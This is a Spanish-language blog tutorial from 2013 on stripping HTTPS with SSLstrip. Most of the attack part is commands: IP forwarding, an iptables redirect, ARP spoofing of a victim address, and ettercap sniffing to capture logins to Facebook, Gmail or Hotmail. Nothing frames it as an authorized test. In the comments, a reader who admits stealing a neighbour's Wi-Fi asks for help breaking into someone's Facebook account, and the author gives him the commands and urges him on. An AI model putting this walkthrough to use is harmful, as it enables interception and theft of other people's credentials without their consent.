miércoles, 6 de marzo de 2013

Home » , » SSLstrip "Penetrando el protocolo supuestamente seguro" (SSL)

SSLstrip "Penetrando el protocolo supuestamente seguro" (SSL)

3 comentarios

Bueno en el siguiente tutorial, veremos como penetrar el protocolo SSL (https), primero que todo  que es SSL?
  • El protocolo SSL es un sistema de seguridad desarrollado etscape y utilizado actualmente por la mayoría de empresas que comercian a través de Internet. Es un sistema de seguridad ideado para acceder a un servidor garantizando la confidencialidad de los datos mediante técnicas de encarnación modernas.
Sabiendo el significado de este protocolo, pasaremos a la tool que nos permitira violar esta "seguridad".

La herramienta que utilizaremos para la penetracion tiene por nombre "SSLstrip"



Extraemos el archivo : tar zxvf  sslstrip-0.9.tar.gz

Vamos a nuestra consola : cd Desktop (si dejamos el archivo en escritorio)
                                             cd sslstrip-0.9
                                             sudo python ./setup.py install


Luego de esto abriremos otra consola : cd /Desktop/sslstrip-0.9 y pondremos lo siguiente: 

- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
- python sslstrip.py -p -l 1000

Con esto tendremos andando el sslstrip :D
(no cerramos la terminal solo minimizar)

Vamos a : cd /Desktop/sslstrip-0.9
                  tail -f sslstrip.log

Dejamos abierta esta consola tambien...

Luego de esto abriremos una consola y pondremos " ifconfig "



Luego de esto necesitamos 2 ips, la nuestra y la remota (a la cual realizaremos el ataque al protocolo SSL)

Una vez teniendo las 2 ip, haremos correr el Arpspoof

En una nueva terminal pondremos :

- arpspoof -i (interface: "eth0 - wlan -t <victima > <gatewayIP>
- arpspoof -i eth0 -t 192.168.137.1 192.168.137.107

Si todo sale bien, empezaremos a correr nuestro Sniffer en este caso Ettercap

- ettercap -Tq -i eth0

Luego de esto solo queda esperar a que se logee por ejemplo facebook, gmail, hotmail o paginas que utlizen el htttps y buala :D 


Share:

3 comentarios:

  1. Anónimo25 de mayo de 2013, 22:42

    Hola, he ocupado una ves backtrack y fue para sacar un pass del internet de mi vecino, a la cemana pague el mio y todo bien, encontre tu blog por suerte en busca de ha.c-k´´ear una cuenta de face book, piblicaron una foto mia donde voy a tener problemas si se entera mi esposa, mi devilidad son las mujeres, y nececito quitar esa foto de esa cuenta, esto me puede serbir?.

    Posdata. En una nueva terminal pondremos :

    - arpspoof -i (interface: "eth0 - wlan -t
    - arpspoof -i eth0 -t 192.168.137.1 192.168.137.107

    en donde dice victima ahi pongo www.facebook.com o el nick de la cuenta de la persona que puso mi foto?.

    Grasias de anterrespuesta

    ResponderEliminar
    Respuestas
    1. Anónimo25 de mayo de 2013, 22:48

      corrijo mi pregunta

      En una nueva terminal pondremos :

      - arpspoof -i (interface: "eth0 - wlan -t
      - arpspoof -i eth0 -t 192.168.137.1 192.168.137.107

      Eliminar
    2. Unknown25 de mayo de 2013, 23:38

      Asi es, arpspoof -i eth0 -t 192.168.137.1 192.168.137.107

      recuerda poner correctamente tu interfaz(etho, wlan0, etc),
      a la vez te paso a dejar un video para que lo entiendas mejor,
      no es creado por mi, pero espero te sirva:
      http://www.youtube.com/watch?v=_rNlOmbhlQU (aunque no concuerdo con el titulo de ese video ^^)
      ojala se solucione tu problema, y a la vez intenta otras formas para joderte a ese tio

      Saludos !


      Eliminar

Labels

Analisis (6) Android (1) Auditoria (15) BruteFoce (7) centOS (1) Cloudflare (3) DDos (1) Distros (5) Exploits (3) firewall (1) hacking (11) Herramientas (126) Incapsula (1) lfi (1) Malware (2) Pentest (49) Perl (2) Proxys (1) python (10) Scan Sql (1) Seguridad (52) Windows (1) Wireless (5) Wordpress (1) XSS (5)
  • Ataques RFI
    Esta  vulnerabilidad  solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros s...
  • Nessus Scanner de Vulnerabilidades
    Bueno comenzaremos definiendo que es Nessus: Nessus es un programa que escanea vulnerabilidades de diversos Sistemas Operativos (Windows...
  • Webslayer - Web application bruteforcer
    WebSlayer es una herramienta diseñada para ataques de fuerza bruta aplicaciones Web, que puede ser utilizado para la búsqueda de recursos ...
  • WebVulnScan Scanner + Prueba Online
    WebVulScan es un escáner de vulnerabilidades de aplicaciones web. Se trata de una aplicación en sí misma web escrito en PHP y se puede ut...
  • Fern Wifi Cracker - Wireless Penetration Testing
    Bueno aunque esta Herramienta es bastante conocida, no esta demas dejarla para los que no cuentan con backtrack en el cual  viene ins...

FOLLOWME


Translate

Followers